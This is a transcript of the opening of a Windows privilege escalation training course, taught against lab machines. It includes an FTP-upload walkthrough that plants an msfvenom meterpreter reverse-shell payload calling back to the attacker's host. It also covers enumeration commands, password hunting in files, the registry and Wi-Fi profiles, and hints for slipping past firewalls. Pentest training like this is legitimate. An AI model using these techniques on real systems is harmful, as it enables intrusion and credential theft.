Windows Privilege Escalation for Beginners

Captions
what's up everybody TCM here back with another video and today we're dropping another course on YouTube so this course is Windows privilege escalation for beginners if you've ever been in a hacking situation where you land on a machine and you're not an administrative user you're a low privilege user and you need to somehow find out how to escalate your privileges this would be the course for you if you're taking exams such as the pmpt or the oscp or other Hands-On exams that require you to do privileged escalation this course would be for you so we're going to cover in this course is strictly Windows based everything's gonna be Windows based all the labs will be provided I'll teach you how to do that as you go full disclosure this is a course that is on our website so if you go to the TCM Security Academy which I'll link below what we are providing is the first three or so hours of this course if you scroll down here on this website you can see the course curriculum and this is the only time I'm going to try to sell you anything in this course all I'm asking for is if you watch the course and you enjoy it and you want to see the rest it's on our website we'll take you through the curriculum we'll take you through the enumeration automated tools kernel exploits a lot of different escalation paths through here all the way through this run as we do have additional labs and other escalation paths that we continue on in the course and then we actually end with this Capstone that ties everything together however there is a great stopping point here if you just took away from this course right up until this point you'll still come away with a lot of knowledge completely free no purchase required whatsoever the only thing I ask and I wouldn't be a YouTuber if I wasn't is to just consider subscribing to the channel and if you do go to our Channel page and you scroll down there are other full-length hacking courses I think we have 30 plus hours of just hacking course 
material on here now including a Linux privilege escalation course so the sister or brother course to this course so if you're ever interested in learning more we have plenty of free courses on our YouTube channel would love for you to subscribe now with that Spiel out of the way we're going to go ahead and jump right into the course and I really hope you enjoy it hello everybody and welcome to this course titled Windows privilege escalation for beginners my name is Heath Adams and I'm going to be your instructor for this course so a quick who am I I am a husband hacker military veteran Etc I'm actually a former accountantern security geek and I love to teach I am an ethical hacker day to day and I'm actually a business owner over at TCM security which focuses primarily on ethical hacking so you could see some of my certifications I have including several certifications in the pen testing field and I'm also a twitch streamer YouTuber Etc by the identity of the Cyber Mentor if you're curious to check me out in my other courses I do have the udemy course of practical ethical hacking which at the time of recording does have over a hundred thousand students so I have taught quite a few of you and I'm really excited for those who have joined this course and are looking to learn with me even more so why this course well really to gain a better understanding of privilege escalation techniques and what is privilege escalation well in ethical hacking when you land on a machine and that machine is not system or not root then you have to escalate your privileges and there are a multitude of techniques that you can use to escalate your privileges so we're going to teach not just the techniques but the methodology behind that in this course and another reason is to improve your Capture the Flag skill set so maybe you're deficient in your escalation techniques and you're struggling on Capture the Flag or hack the box or try hack me or any of those sites where you can attack 
vulnerable machines and you just want to improve there lastly is to prepare for certification courses the oscp the elearn security PTP even the e-learn security pts and the ceh now have practical portions of their exams or are all practical and they require some sort of privilege escalation so if you're trying to prepare for that type of course then this is the course for you so let's briefly talk about the prerequisites and requirements of this course now some ethical hacking knowledge is strongly recommended this course is meant to teach you privilege escalation but is not going to hold your hand like you are a beginner it does assume some knowledge if you have no experience in ethical hacking you are going to be lost in this course it is strongly recommended that you check out the Practical ethical hacking course first and then migrate over here once you've completed that course if you do have some ethical hacking knowledge and you want to take this course and move forward the only other thing that you need is really a Linux or ethical hacking workstation of your choice there will not be any lab set up from our perspective it is assumed that you know how to run a Linux machine or an ethical hacking machine at this point now two big things to point out a subscription to hack the box is really really really recommended it's not required but it's really recommended as a good majority of the machines that we walk through to our hack the Box related now there's also a subscription to try hack me for a couple of the machines that we walk through however I have built an entire lab out and try hack me that will be free for this course so you do not have to subscribe to either of these but it is recommended to do it especially the hack the box side at the time of recording it is 13 US dollars to subscribe to hack the box and around 10 US dollars to subscribe to try hack me and please know I have no affiliation with either of these I have no Kickbacks or anything the 
reasoning behind this is that Windows licensing is very very expensive so in order to have you build your own lab and purchase your own license we were talking a lot of time and expense a subscription to hack the box and try hack me was a lot cheaper alternative and an easier way to teach this course than having you download and install your own Windows machines and purchasing the licensing behind it so with that out of the way let's talk about what you're going to learn turn so the big focus is going to be on how to enumerate Windows systems manually and with tools you're going to have a lot of Hands-On practice in this course there are 13 vulnerable machines at this time of recording and there are full plans to add more machines as time goes on there is going to be a custom lab out there with no installation we'll either use hack the Box machines or the try Hackney lab that I have built out and there is going to be a Capstone challenge of five machines so throughout the course you're going to have eight machines to practice on the Capstone is going to be five machines by itself and you're going to get to see and test your skills and everything that you've learned now we have a multitude of privileged escalation techniques in this course that we are going to teach including kernel exploits password hunting impersonation attacks Etc even some newer techniques like the windows subsystem for Linux and cve 2019 1388 the goal of this course and for me personally as an instructor is that I will continue you to update this as new privilege escalation techniques come out and I feel that are relevant for this course so when it's all said and done you will have learned a wide variety of privilege escalation techniques and the ways to enumerate them manually and with tools my goal for you is that you should be able to get through this course and feel a lot more comfortable when it's all said and done with your privileged escalation capabilities and the last thing to point 
out is there are important resources for this course but you have to check the bonus video which is the last video in the course I have a Discord channel that you guys can come check out it has access to q a sections and you have direct access to not just me but other people that are taking the course and it's a the fastest resource to get help when you have any sort of problem you're stuck with in the course so if you run into issues you want to network with other people Etc there is a Discord Channel due to udemy rules we have to actually post that in the bonus video so come check out the bonus video and we'll get you linked over to the Discord Channel with that being said I really do hope you enjoy this course I look forward to teaching you and I'm excited to get started so let's go ahead and move on to the next video and we're going to start talking about the important resources to know for privilege escalation and how to be successful in this course so I'll catch you over in the next video before we fully dive into the course I would like to share with you some of my favorite resources that I've uncovered while doing prevask especially on the Windows side so the first one here is this fuzzy security now this is the one that I went with when I was doing the oscp since then better ones have come out but this is still one that I like to refer to if you come through here it gives you a step-by-step guide on all the little things that you might want to look for for doing prevask and you can see how long this guide really is it's amazingly detailed and it will help you out significantly now there are three other guides just like that here is a Windows priv ask and this one's way more up to date and covers a lot newer stuff we'll be referring to this one quite a bit more from payload all the things or the Swiss Swiss Sky repo so you can see how many things are in here as well now I'm going through this really fast we're going to go kind of one by one as we go through 
the course so don't worry about it here again Windows privilege escalation guide and another Windows privilege escalation guide I'm going to link all of these in the course resources so you can check them out you can look through them see all the different things and you can see that privilege escalation is very detailed all of these guides are very very long because there are so many different ways to escalate a Windows system even a Linux system there's just all kinds of escalation techniques and there's no course that's going to cover them completely but I'm going to do my best to get you with the methodology that you're gonna be able to find a lot of these without any issues but what I need for you to do to be successful in this course is I want you to make sure that you are taking good notes and make sure that you are understanding the concepts if you're doing something and you're not getting the reasoning go back and watch the video again if I'm not clicking with you then go out to Google make sure that you find the resources you do the read eating and you understand the concept before you move on to the next item so good notes are going to take you really really far now of course you've got these notes here that you can refer to but it's always at least for me always good to take good notes take screenshots make your own commands up and have your own cheat sheets that you can refer to on top of these things and just writing it down really does help so it helps you retain the information it helps you understand the information so make sure you're taking good notes if you get stuck again if go watch the video again or go out and check for other resources and just make sure you're understanding everything before you move on in the course other than that I really really do hope you enjoy the course and I look forward to teaching you throughout this entire course and I hope you enjoy the experience so I will catch you in the next video as we start to dive into 
enumeration and getting our first foothold on the network so let's go ahead and meet you in the next video welcome to the first part of this course so before we can actually dive into privilege escalation we need to actually have something to escalate privileges against now I weighed the decision pretty heavily on how I wanted to approach this the most economical way was to actually use a service similar to hack the box or try hack me or or one of those other services that are out there that have labs this is because windows requires you to have a license you see a lot of Linux boxes out there for free well Windows requires a license and Licensing can be expensive so instead of requiring licensing the cheaper alternative was to use a vulnerable site like hack the box and give instruction via this so what we're going to do is we're going to utilize hack the box now for the first portion of this course you can actually run this on any Windows machine we're just doing basic enumeration but what we're going to be doing here is we're going to simulate an attack we're going to get lower level privileges on a machine and then we're going to do enumeration on that machine now you can forego all this and just do this from your command line on your own Windows machine nothing malicious is going to be done during the enumeration process however if you want to follow along step by step you will need a hack the box subscription so that will run ten dollars to thirteen dollars approximately and if you've never used hack the Box before that's okay it does require you to quote unquote hack your way in however that is very easily googleable if you want to do some research and look on how to get a subscription it's very very straightforward so we're going to be utilizing this for the enumeration portion and then as we start to tackle machines and one-off type vulnerabilities I'm going to be using different machines here to show you how that works now throughout the course my 
challenge to you is going to be to attempt the machine that I show you before actually watching the next video so what we're going to be doing for this for example is we're going to be spinning up this devil machine d-e-v-e-l and it lives at 10.10.10.5 so all you have to do is press the start button machine which I've already done you can just press start button next to it get it spun up and then what you're going to do is go ahead and try to scan it use nmap try to attack it see what happens what I want you to do is try to get to the low level user and then meet me in the next video we're going to go through a walk through after that we'll start the enumeration so if you have any questions you want to see my methodology I'm going to cover that in the next video but I'm going to kind of do it kind of quickly again this is kind of more of a non-beginner course we're kind of moving into the intermediate style level so I almost expect you to be able to solve this first half and then meet me kind of in the Middle where I teach you how to how to escalate the Privileges that makes sense so every box that we do in this course I'm going to challenge you to go ahead and try to get to that low level user and then we'll work on escalating but every box will have a walk through in case you do get stuck so what I'm going to do now is ask you to go ahead and try give it a go and in the next video I'm going to show you how to get a low-level user on this box and then we'll start working on enumeration and moving forward with our escalation tactics foreign so I am back now with the scan and you can see that I have the scan here which is showing us Port 21 and Port 80 open now when we look at Port 21 we've got the file transfer protocol now if you recall that just means that we can upload and download files off of a server we're just transferring files and we can see here that we have Anonymous login via the FTP and the files look almost like a default IIs web page we've got the 
isstart.htm and if you've ever seen that you know you're just looking at the hey this is a web page hasn't been built yet you got the welcome.png it feels very very welcome page and then we've got Port 80 which is just saying hey it's Microsoft IAS and it's got an is-7 header but it doesn't really say anything about what's on there so let's make a quick little journey out to the web server and see at 10.10.10.5 what we've got uh and there it is it's a it's a welcome page now if we right click on this and we say save image as you can see the image is actually welcome.png so I have a little hunch when I'm just looking at this scan that we're actually sitting in the web server directory itself now what we have here is we have Port 21 open and while Anonymous login is bad all we can do is put and delete files it becomes really bad when we can chain the exploit and actually execute a file so my hunch is that we can upload something malicious and then execute it with Port 80. so we're going to go ahead and test that out first we're going to just do a quick Echo and say this is a test and I'm going to put that into a file called test.txt from here I'm going to go ahead and FTP out to the server and I'm going to see if I can upload this file and then access it so I'm going to go ahead and just type in Anonymous and try to log in and I'm using Anonymous as the password as well we can go ahead and just say put and we'll say test dot text now if we go out to the web once that file's uploaded and we say test.txt you could see it says this is a test okay that works so what we're going to do now is now that we know we have execution we can go ahead and get malicious we can go with the new tab and what we want to do is we want an aspx type exploit now why do I say that because this is an IIs server we can see if your utilize utilizing something like appalyzer we've got asp.net obviously it tells us IAS so the file extension for that is aspx now if you've never done this before 
you can go out to Google and say uh interpreter payload cheat sheet something along these lines and we've got medicine payload cheat sheet msf NM cheat sheet we'll go ahead and just use the msfm cheat sheet and any sort of web payloads we're looking for something like ASP or aspx so this one will work right here creates a simple TCP shell for ASP so we're just going to use msf Venom Dash p Windows interpreter versus underscore TCP we'll set our lhost our L port and then our file type so that's the kind of syntax we're going to be using you can just follow along with me you don't have to actually go out to that website and copy and paste everything so this is going to be the initial start of the payload we're going to say windows interpreter reverse underscore TCP for the payload and then we need the lhost which I don't know my L host so I'm going to go out and say ifconfig and I am connected here 10.10.14.4 so I'm going to go ahead and use that as my lhost and then for my L Port I'm just going to say all fours and then remember we're going to need the file type so for this I'm going to use aspx and then we're going to go ahead and just call it exploit.aspx and that should generate a shell for us now once that is generated what we're going to need to do is we're actually going to need to load up Metasploit now this course is not going to rely on metasplay a lot this is just the initial exploit vector and I'm going to show you some initial enumeration that you can do with Metasploit but everything is going to be pretty manual moving forward after this little bit so let's go ahead and we're going to use multi exploit exploit multi-handler sorry and we're going to go ahead and say options so we're going to do is we're going to set the same payload that we just did so we're going to set payload to Windows interpreter [Music] and then we're going to say reverse TCP you should be able to tab it out now if we go to options you can see that it automatically sets the L port 
to the default 4444 we also need to set an L host so I'm going to set my L host to Tunnel zero which is the interface that we are on right now so if you're on a different interface or you can set it directly to the IP address and then I'm going to run this and this is going to set up that listener so now we're listening on this port for a reverse connection using Metasploit to do so so I'm going to go in here and I'm going to reconnect because chances are this FTP is probably timed out I'm going to go in here and just reconnect real quick and we're going to upload this file so now we're going to put the exploit.aspx and with our listener running we're going to go ahead and go out to the web I'm going to close this out and I'm just going to forward slash exploit.aspx just like this hit enter let's see what happens okay we've got a meterpreter session so session one is open we can say get uid see if that works okay and we can say uh sysinfo and you can see that we are on a Windows 7 machine 32-bit or x86 architecture we have a 32-bit interpreter shell and our ID here is Ias app pull web so we are not an administrator we are not Authority system so that means we have privileges to escalate so we're at the perfect stopping point and if this didn't make sense to you maybe you're not ready for this part of the course yet maybe this is a little Advanced you might need to go back and do some more studying you could check out my other udemy course as well which is uh takes this and walks you through a lot more step by step and will get you ready for something along these lines but if this all made sense you figure this out already we're good to go we're good to move on and we're going to start working on these escalations so I'm going to see you in the next set of videos where you start talking about enumeration and how we're going to look at and identify things that can be potentially exploitable and allow us to escalate our approaches so I'll see you over in the next 
video so now we have a shell and we need to start focusing on enumeration now this just goes back to our hacking Roots you know the five steps of hacking and the first three of those are information gathering scanning and enumeration and then exploitation well we've done that and now we've exploited this machine but we are a low level user so guess what we have to go back to our roots and we have to start focusing again on that scanning and enumeration we have to look at what information is out there and see how we can utilize that to elevate our privileges into a system level user that is our end goal here so what we're going to do first is we're going to focus on system so system enumeration is looking at things like system info and we can see things like the operating system name or the operating system version maybe the system architecture we can look at the hostname we can extract patching and see what sort of patching is out there what sort of hot fixes are out there and we'll talk about that here in a second and we can look at things like the drives on the system Etc so we just want to take a look at what the system is providing us from a high level so let's dive into a shell and one of the first easy commands that we can do is just type in system info and this will come back into play a little bit later when we actually utilize tools for all of this but here you can see that we have the hostname we've got the operating system being Windows 7. 
we've got the operating system version we got the manufacturer all sorts of information who the owner is of this machine we could tell we're running on VMware so x86 architecture Etc now in all those resources that I provided you there are some great one-liners now this is one of those I've kind of Taken and modified but let's say that we want to just pull down system info and we kind of want to grep upon it and I just want to pull down a few things so let's say system info and the pipe here is similar to grep we're going to just say find string and we're going to just go forward slash B forward slash C and we're going to grab the OS name we're going to grab the OS version and we're going to grab the system type and let's take a look at what this does now I don't expect you to type this all out it's just as easy to put in system info and review this but say you just wanted to pull down this information this is a quick way to do it and this is a good way just to learn the syntax of Windows command line if you're not familiar with it so we can do a quick find string pull down some information and now we just see instead of all this mess we can say hey we're running on Windows 7. 
here's our build version here's the version type Etc and then we've got an x86 architecture on this PC so that's very useful information to know for example if we're trying to run an exploit against this machine and this exploit is for 64-bit only we can rule that one out because we know hey it's only x86 architecture or if we're trying to run a kernel based exploit for example which we haven't gotten to yet and we're trying to do it against a version that is newer than this it's probably not going to work so we want to make sure that we fall in line with the right parameters for the exploit and having the information in front of us helps same thing maybe the exploits for Windows 10 and doesn't work on Windows 7 or maybe it's for Windows 7 Home Edition doesn't work on Enterprise there's a lot of variables here for exploits that we need to kind of understand the information behind them before we can just start firing exploits at this so it's good to know your system info if you want to pull down things like hostname you can add that in or you can just type in hostname for example but also appears in the system info another important thing to do is we can extract patching so we can look at how well patched the system is now it's not going to work on this system this wmi qfe and I'll explain what this is in a second you can see I typed it in doesn't work so I'm going to pull up another Windows box that I have and I'm going to show you what it does look like when you actually run it against the system where it works now wmi what is that that's the Windows management instrumentation and the C just stands for command line basically what it does for us is it returns information about the system that we're running it on and what we're looking at with the qfe is what's called Quick Fix engineering we're basically just trying to see hey what's available what's been patched when was the last patch so let's pull up this command prompt here and let me just say wmic qfe here and 
if you have a Windows machine you can do this again on yours and you can see things now you can see okay well here is the knowledge base ID here's the hotfix ID here's who installed it and here's when it was installed so maybe we know based on these different knowledge bases whether or not something is patched or not patched with what we're looking at so this is a very common quick and dirty command to run now we can run something like this let me just copy and paste it and show it to you if you want to copy and paste this out you can and that do not copy I apologize uh so when we copy and paste this we can kind of narrow down and just say wmic qib and then we can say get and we could just pull down what we want so we only want the caption the description the hotfix ID and then installed on then we can really narrow down and not have to look at this big list we can just get a nice and cleaner list here so this is one of those things just like that system info where you can put this into a quick copy paste list if you're doing enumeration or we can rely on tools once we get to the tools section to actually kind of help us and do this for us so this is important to know again we can look at the knowledge basis see what's out there and how we can exploit it so the last thing I want to show you with system related for now we'll get into more things that we're going to look at as we go but just the basics of what we're looking at is just let's list out the drives maybe there's other drives out there so what we can do is we can do it at wmic again and we can just say logical disk and you can see all the different information here that looks kind of dirty right we don't really want that so we could do something like list drives or uh actually or we could just do something like this this is what I actually like to copy and paste so we could do wmic and again we'll just do get caption description provider name and Watch What Happens and then you can see hey c d e f and H 
exists on this one specifically now if you just wanted it really quick and you just want to say hey wmic logical disk you could just say get caption and get the caption and it'll still pull down how many drives are there and you don't have to necessarily pull down the description or provider name but uh quick quick wins here to see what's there maybe you're enumerating a machine and you're on the C drive but maybe there's this e f and H drives that you can look through maybe there's information in those drives you want to make sure that you have the knowledge in front of you and all the information in front of you that's possible so that's it for this video we're going to go ahead and move on to user base enumeration and so I will catch you in the next video when we start talking about how to enumerate users and groups okay now we're on to a user enumeration we're back on our machine let's just go ahead and type in Shell on this and we can look at the different types of users first let's start with ourselves we get to say something like who am I and you can see on this machine where IIs app pool so this means that we are not the system level user that's okay we can also look at our privileges say who am I slash prev and this will provide some information and all this might not make any sense right now this will come back into play later when we talk about token impersonation and how we can utilize that from different perspectives one from what we call potato attacks either juicy potato rotten potato Etc or even just standard token impersonation we'll talk about that in Privileges and how they work so it's very interesting but we'll dive into it later just know this who am I Prive command exists and that allows us to look at different privileges that we have available to us so last we can do who am I slash groups and we can look at what groups we're involved in so you can tell that this user is not part of any sort of administrative group we just look to be part of 
standard users nothing going on here that's exciting for us but you never know we might be part of an administrator group and we might have rights in even though we say IIs app pool maybe it was misconfigured and we actually have admin rights to begin with so it's always good to look at the groups that we're belonging to now we could type in something like net user and that will show us the users on this machine so you could see that there are actually just really two users they have a guest account but we have administrator and then this babus user well we're honest service is what we actually landed on so we're not on a real user account we just happen to be a part of a service that's running which is the IIs service so what's happening here is we're taking over a service but there are these user accounts so maybe we can move laterally into a user account and then escalate into administrator or maybe we can just escalate directly into an administrator account we don't know quite yet but it's good to know what's out there and how we could take advantage of it possibly we could also look at specific users like we want to say net user babis and we can see information about babis we can see when their password was last set when it expires all of this is just extra information right and you can see what group memberships they have same thing with the net user of administrator we can take a look at this and you can see what group memberships they have well look they're part of the administrators where this babus user is just part of the users group so if we were to take over this babus user it still wouldn't matter because we wouldn't be escalated fully we would just be at a same level user that we're at there might be more information maybe there's a password store to file or something on that user that we didn't have access to as the current user but for now it's not an admin user we can identify what admin user we could possibly take over just by doing quick user 
enumeration like this. So the other thing that we can look at are the local groups, so we could try net localgroup. Sometimes it works, sometimes it doesn't; you can see here we don't have a logon session that actually exists, so it's not going to work for us. But maybe we know a local group that does exist, like Administrators. Then we could say, hey, I want to look at the Administrators group; maybe there are a bunch of users and we just want to see who's part of that group. Well, we could find out the membership quite easily: here we see it's administrator, and that's all we have to focus on. So that's really it for now. Again, a lot of these are going to come back into play later on; I'm just trying to get you introduced to the basics and to what you should be looking for, system related, user related, and next we're going to focus on network related. So we're going to dig into some network enumeration and move on from there, so I'll catch you over in the next video.

So next up on the list are our network enumeration commands, and I'm just going to throw a few at you for now, but we're going to explain why they're important. So again, we're going to go ahead and enter into a shell and let's take a look at some of them. The first may be obvious, but we're going to run an ipconfig. Now we can run an ipconfig and see what the IP address of the machine is. We can also get more details by running ipconfig /all and seeing a little bit more information than we did before: we can see the default gateway, we can see the DNS servers, etc. So this just provides information on the architecture. We might even see something like, if we're on a domain, we might see the domain controller here as a DNS server, or it just gives us a little bit more information as to where our next attack might be, what our subnet structure is, etc. So it's important to know. Another thing that we're going to look at is our ARP table, so we can just say something like arp -a, the -a being for
all. This won't be that big on most CTF machines, but if you're in a lab environment there's a chance that you might see another IP address here. So we see .2 and .255; chances are this is a broadcast ID and maybe this is your network ID here. It's hard to say without knowing for sure, but we know we're at .5, or actually, yes, our .2 is our DNS server, so we know we're talking to DNS, and then we have a .5, which is us. Maybe we saw a .6 or a .7 or a .75, whatever; if we saw another IP address in here I would be instantly suspicious as to why it's in our ARP table, especially in a lab environment, how it's communicating with us and what we can do about it. So if you're not familiar with these networking protocols then you probably need to brush up on what ARP is or what ipconfig is, etc.; those aren't going to be taught in this course, but we should be looking at the ARP table. We should also be looking at the routing table; something like a quick route print will tell us where this is communicating as well. So we're interested in seeing the 10 address, and you can see the 10.10.10.5; there's not another network on here. Same thing with the ipconfig, by the way: sometimes you see dual-homed IP addresses, where there's a 10.10.10.2 and maybe you would have something like a 10.10.11.2 or something like that, or .5, where we see a second NIC on this machine, and that would mean that this is communicating on one address and then communicating on another address, and maybe we don't even need to elevate, we just need to pivot on this machine. So there are a lot of different reasons for looking at what's going on here. Same thing with the ARP table, that's another thing: if we're communicating to another machine, that's important to know. The routing table, same thing. And then netstat is super important, so let's do a netstat -ano and see what ports are out there. We should know, you know, where are we talking to, who are we communicating
with. Well, you can see we're communicating with us over this 4444, and that's an established connection. But what about all these listening ports? Like, we're listening on 139, okay, but we have all these other IPs here that we're listening on, and how many of these actually showed up when we were looking at the box originally? Well, not a lot of them, right? We had 21 and 80. I didn't see any of these externally facing to us when we did a search, so where are these ports coming from? Here are UDP ports; where are these ports coming from, why are we seeing them, you know, inside the box but not outside the box? So maybe these services are only available to us from the inside network, and that could be interesting too, because that could allow us maybe to do some sort of port forwarding using a tool like plink, or even Meterpreter can do it. That's just a foreshadowing of what you might see a little bit later on in the course, so keep in mind that these internal services are important as well. So for now we've established that we need to do some basic enumeration, right? We need to look at the system, we need to look at the users, we need to look at the network, just kind of gather what's around us before we just start going crazy and looking around all the files and infrastructure. Now, when we get to the tools section, I'm going to show you all the tools that can do this for us. The next thing I want to show you, before we move on and start looking at different tools and start talking exploits, is how to do some basic enumeration hunting down passwords, and then we'll move on and start doing our actual exploitation and using tools, etc. So I'll catch you in the next video when we start talking about hunting down passwords.

Now let's briefly talk about passwords, and we can drop down into a shell here. I say briefly because there's a lot of password hunting that can be done, but we're going to be able to automate that, as you're going to
see in the upcoming tools lesson, and you're going to be able to see in the password hunting section of the course. But we have to think about passwords being in files. Now, from a pure pentest perspective, I see passwords in files all the time: if I get onto a user's computer or I get into some kind of share drive, people just store passwords in files, it's what they do. But this could mean more than just that: we could be talking about the SAM file, which stores our hashes on Windows, if there's a backup of that laying around, or something called unattend.xml, which is used sometimes and stores passwords. We talk about Wi-Fi passwords: think about somebody taking their computer home, getting on their network, using the same password that they use for their Wi-Fi at home and then using that as their work credentials, or something along those lines. So there are passwords that are stored in clear text for Wi-Fi. There are a lot of things that are out there where passwords can be stored; passwords could also be stored in the registry. I'll show you some of these things and we'll do a quick overview of what we're looking for and how it works, and then we're going to look in the tools section and see how that works when it's automated and does a lot of this legwork for us. Then we'll see how it all comes together later on when we actually exploit this and we see how passwords can be dangerous. But from a pure password perspective, super common, at least in real pentesting, and something to always look for when we're talking about this capture-the-flag style privesc environment. So I'm here in this inetsrv directory and we can do a quick findstr, so we can say something like findstr /si, and we're just going to search for maybe the phrase "password", and we can search for that in just *.txt, for example, and this is going to find nothing. We could go back a directory, since it's only searching in this directory; we could go back one directory to System32, and maybe I'll
just copy this and paste it here, and if we want to search more files we could say something like *.ini *.txt, maybe *.config. This will add time to our search, but we could try to hunt these down. Now, while this is going (this might take a minute as we're looking through the whole System32), we can go ahead and just look at some resources that I actually really like and we'll go from there. Actually, it just finished pretty quickly here, so you can see what it's trying to do: it's looking for the phrase "password", and you can see it comes into play here in these hash tables, and it really doesn't look like it's anything, it just looks like it's a configuration or just a basic .txt. Same thing here. So we're going to find a bunch of these things we might have to sift through, but it's just part of the enumeration process, and somebody might have, maybe on their desktop, just something like password=mypassword123 or something along those lines, or think of like a SQL configuration or a web configuration; that's why we search maybe those .config files, to try to look for different passwords that we might be able to use to escalate. Now, those resources: this just comes back to the resources we pointed out in the first section of the course. Here's a clear-text password section. Now, if you'd like to do this the complete manual way, there are a bunch of different ways to do this, right? You can search for the term, you can search in files; again, this unattend.xml, there's vnc.ini, the registry. PayloadsAllTheThings is more my favorite one to have and look through, so you have the SAM again, search file contents, all different kinds of cool little things and tricks. And if you really want to scare yourself you can do the Wi-Fi passwords; you can show your Wi-Fi passwords here and see the password of your Wi-Fi network in clear text. So I recommend, if you're using the same password as your Wi-Fi, not to do that, because it's
very easy to pull it down. So with all that being said, this is just a very high-level overview; we're going to get into it, as I said already, in a little bit, so stay tuned for the next few sections of the course as we actually start to dive in and utilize this, and you'll see where these passwords really come into play. So we've got one more video in this section: we're going to quickly talk about discovering firewalls and antivirus and how we can determine if they're enabled in a network. So let's go ahead and jump over to that video.

All right, so the last thing we want to look at are the firewall and antivirus configurations on the machine itself. Now, these don't come into play too often in the capture-the-flag style events, but it's always something to look at, because some of the harder ones actually do have a firewall enabled or antivirus enabled, so we need to know what we're up against, and it's always good to enumerate that. Even if you're in a real-world environment, it's really good to enumerate that. So what we're going to look at first is the service control command, and you're going to see this come up again in the course over and over. The service control command is sc. Let's go ahead and drop down into a shell and we can just say sc, for service control, and let's say we want to just query one that we know. I'm just going to say query, and I'm going to find out information about windefend, so if we say sc query windefend we're going to see information about Windows Defender. Why am I picking this? Well, we're on a Windows machine, and by default Windows machines have Windows Defender on. Well, look, it's running; we know the state is RUNNING, so antivirus is up on this machine and running, but it's not doing a great job, if you ask me: we were able to run Metasploit with a basic shell, we got in on 4444, so not the best. And this is Windows 7, so maybe there's some excuse there; maybe it's misconfigured on purpose, we don't really
know, but the state is running. Let's say we see it as stopped, but we think that maybe there's something still blocking us, some kind of antivirus is running on this machine and we don't know what's going on. We can do a quick service query: we could say something like sc, for service control, and we'll do a queryex like this, and we'll just say type= service. Now, this is going to tell us all the services that are running on the machine. It's going to be a lot, but if we want to search through here and see, hey, what's running, what am I up against? Like, see, here's Windows Defender, but you might see something like, I don't know, Sophos as an example; you might see some well-known antivirus running on this machine, and you're going to say, oh, I'm up against that, now I know what's there, and maybe you start looking into ways to bypass that, just as an example. Now, the last thing that we should talk about is firewalls. So firewall settings are important to look at too. We want to see firewall settings because maybe there are ports open, or only certain ports that we can navigate around. Maybe, as you'll see later, again with the netstat that we looked at, maybe there are ports that we can utilize that are only internally open, and we can utilize those for some sort of port forwarding and use that to exploit a machine further. So there are a lot of cool little tricks that we can do, but we have to know the firewall configuration, especially if we're getting blocked on ports like 4444, which is really common to Metasploit; we might have to run something like 443 and pretend we're doing traffic over a web server, or maybe 53 and pretend we're doing traffic over DNS, something along those lines. We've got to see what's actually open for us. So what command can we run? The common command, or the modern command I should say, is this netsh advfirewall firewall dump. Now, this isn't going to return anything, and that's okay; we are going to use a different command. This is a little bit older, but we're going to say
netsh firewall show state. So either way, try both of these commands depending on the machine you're on. This tells you what the state of the firewall is; you can see that it's enabled and that it's running the regular old Windows Firewall, Group Policy version. So that's a little bit of information. Other information that you can gather is netsh firewall show config, and here's where you can look for specific ports and things that might be open, or any sort of configurations that are in here that are special to this machine. So I'm not seeing anything crazy here, which is expected, we got in on 4444, but it's just something to keep in mind if you're doing enumeration, if you're up against a wall, something that might be sticking out. So something to keep in your back pocket. Again, this is going to be automated when we look at our tools, but it's always good to know the process manually and understand why it's doing it, or why the tools are running it, instead of just firing tools with, you know, no purpose behind it or no understanding behind it. So that's all this section was, and now that we're wrapping up we're going to see how we automate it in the next section. So I just want you to have good notes at this point; if you didn't take good notes, please go back, watch these again, or even go and check out the resources that were provided. Jot down some decent notes on this, understand why we're doing it, and don't just go fire tools at this. So it's just a really high-level overview for you to get the understanding, but now that you have the understanding we're going to dive into the tools. So I'll catch you over in the next video as we start looking at different tools that we can utilize to make this process a lot easier for us.

Okay, let's quickly cover some automated enumeration tools, and I'm just going to show you the list that I've got put out here. So we have executables; these are files that we can either just upload right off the bat, or we can compile using something
like Visual Studio and then upload, and all these will work with Windows, winPEAS being probably my favorite. But there's also a tool called Seatbelt, there's a tool called Watson, there's a tool called SharpUp. Now, these all do generally the same thing. On the PowerShell side there is a tool called Sherlock, which is actually the predecessor to Watson; there's a tool called PowerUp, which is the same thing as SharpUp but it's written in PowerShell as opposed to C#; there's a tool called JAWS, which is awesome as well. And a couple of my favorites, which are this Windows Exploit Suggester, which is actually a Python script you run locally on your attack machine, and the exploit suggester from Metasploit. So I'm going to cover some more of these tools in detail here in just a second, and then in the next video we're going to cover running one or two of these tools and see what happens when they just don't work. What are we going to do? Well, these other categories come into play. These are really nice tools, but there's a reason there's an assortment of tools, because sometimes your executables don't work, sometimes your PowerShell doesn't work, sometimes they both don't work. So what are you going to do when the tools that you rely on just aren't working? Well, luckily there are so many tools out there, we're going to figure it out. So you can take a screenshot of this; I'm going to put in the resources literally every single thing you see here, I'll put a link to it in the resources, that way you have everything. But let me go ahead and go to my attack machine and let's just talk through some of this stuff really quick. So winPEAS. winPEAS is a great, great, great tool. You see winPEAS here; the Windows Privilege Escalation Awesome Script is what it stands for. It is awesome, there's nothing else to say about it besides it's awesome. Now, this does run requiring .NET 4, so if there's not 4.0 or greater on the machine that you're attacking, this just is
not going to work. Now, there is a .bat file that you can try to see if it works for it; that's another option, this winPEAS.bat. The executable works really well also, so that's one option. And the nice thing about it too is this book.hacktricks.xyz is just yet another great resource that you can use: you can come in here and it's just a checklist for Windows privesc. Now, it says, hey, the first thing we want to look for is, is the kernel vulnerable? Well, we haven't gotten to kernel exploits yet, it's coming soon, but let's just open this in a new tab and see what they're asking about. It says, hey, search for exploits for vulnerabilities here, and how do we do that? Well, systeminfo. Well, that one looks familiar; this looks familiar, right? Getting the OS name, OS version, doing the wmic with the qfe to see the installed patches on the machine. It even tells you some of the tools down here that you might run against this: the local exploit suggester is one from Metasploit, Sherlock and Watson are two that we just talked about. So those are some things that you can do, to come through here and look, and it talks about all the different types of enumeration that you can run through your checklist. Even coming through here, hey, look: logging, AV enumeration, user privileges, network information, there are so many things to check for on this privesc checklist, right? The nice thing about it is this tool does it all for you, and so do the rest of the tools, really; they're all very much the same in what they do, and they're all very awesome in their own way. So things like Sherlock: Sherlock is a PowerShell script that looks for common vulnerabilities. Okay, it's not as complete in my opinion as winPEAS, and what you need to do is you just need to run these against your machines and see what works for you. Honestly, the best place to run these is against your own computer, or a computer you have in a lab environment. If you've got a Windows machine, running it
